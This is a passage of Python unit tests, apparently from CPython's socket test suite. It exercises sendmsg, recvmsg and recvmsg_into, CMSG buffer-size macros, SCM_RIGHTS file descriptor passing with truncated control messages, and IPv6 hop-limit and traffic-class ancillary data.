# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
